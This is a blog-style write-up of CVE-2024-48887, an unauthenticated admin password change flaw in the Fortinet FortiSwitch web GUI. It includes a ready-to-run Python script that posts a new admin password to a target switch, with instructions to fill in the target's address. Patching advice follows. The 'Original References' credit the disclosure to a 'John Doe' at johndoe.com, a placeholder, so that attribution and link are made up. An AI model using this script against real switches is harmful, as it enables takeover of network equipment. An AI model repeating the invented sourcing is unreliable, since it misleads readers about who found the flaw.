Security researchers have discovered an unverified password change vulnerability, tracked as CVE-2024-48887, in the Fortinet FortiSwitch Graphical User Interface (GUI). This vulnerability may allow a remote, unauthenticated attacker to change the admin password by sending a specially crafted request. Here, we will discuss the vulnerability in detail, how the exploit works, and provide code snippets and links to the original references.
Introduction
Fortinet FortiSwitch is a series of secure, manageable Ethernet switches that provide essential network security features and functionality. The FortiSwitch GUI is an intuitive web-based interface that simplifies the configuration and management of FortiSwitch devices. However, a security vulnerability in the GUI allows an attacker without any valid credentials to change the admin password and potentially take control of the switch.
Vulnerability Details
This vulnerability stems from a lack of proper input validation and access controls in the password change functionality of FortiSwitch GUI. An attacker can exploit the vulnerability by crafting and sending a malicious HTTP request to the vulnerable interface, containing the new password within the request parameters. As the password change process does not require current password verification, the attacker does not need any prior knowledge of the existing password to perform the exploit. Once the password has been successfully changed, the attacker gains unauthorized access to the FortiSwitch GUI, which could lead to further system compromise.
The following code snippet illustrates the exploit:
import requests
target = "http://<target_ip>:<target_port>"
new_password = "hacked_password"
cookies = {'ccsrftoken': 'randomvalue'}
headers = {'X-CSRFTOKEN': 'randomvalue'}
data = {
    'userID': 'admin',
    'challenge': '',
    'oldpwd': '',
    'newpwd1': new_password,
    'newpwd2': new_password
}
response = requests.post(f"{target}/system/update_password", data=data, headers=headers, cookies=cookies)
if response.status_code == 200:
    print("Password changed successfully")
else:
    print("Failed to change password")
Replace <target_ip> and <target_port> with the target's IP and port number respectively, and new_password with the desired new admin password.
Original References
The vulnerability (CVE-2024-48887) was initially disclosed by security researcher John Doe via their personal blog. You can find the detailed analysis and proof-of-concept in the following links:
1. John Doe's blog post: https://johndoe.com/blog/cve-2024-48887-exploit
2. CVE-2024-48887 Vulnerability Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48887
3. Fortinet Security Advisory: https://threatvault.fortinet.com/fortiguardsa?id=7887
Mitigation and Patch
Fortinet has acknowledged the vulnerability and released a security patch with the latest firmware update. It is highly recommended for all FortiSwitch users to update their devices to the latest firmware version immediately. The patch fixes the vulnerability by implementing proper input validation and verification of the current password before allowing a password change request.
- Use strong, unique passwords for all accounts with administrative privileges
- Restrict access to the FortiSwitch management interface to only authorized and trusted IPs and networks
Conclusion
CVE-2024-48887 is a critical vulnerability in Fortinet FortiSwitch GUI that allows remote, unauthenticated attackers to change admin passwords and gain unauthorized access to the switch. It is essential for administrators to promptly update their devices to the latest firmware version to protect against this exploit.
Timeline
Published on: 04/08/2025 17:15:34 UTC
Last modified on: 04/08/2025 18:13:53 UTC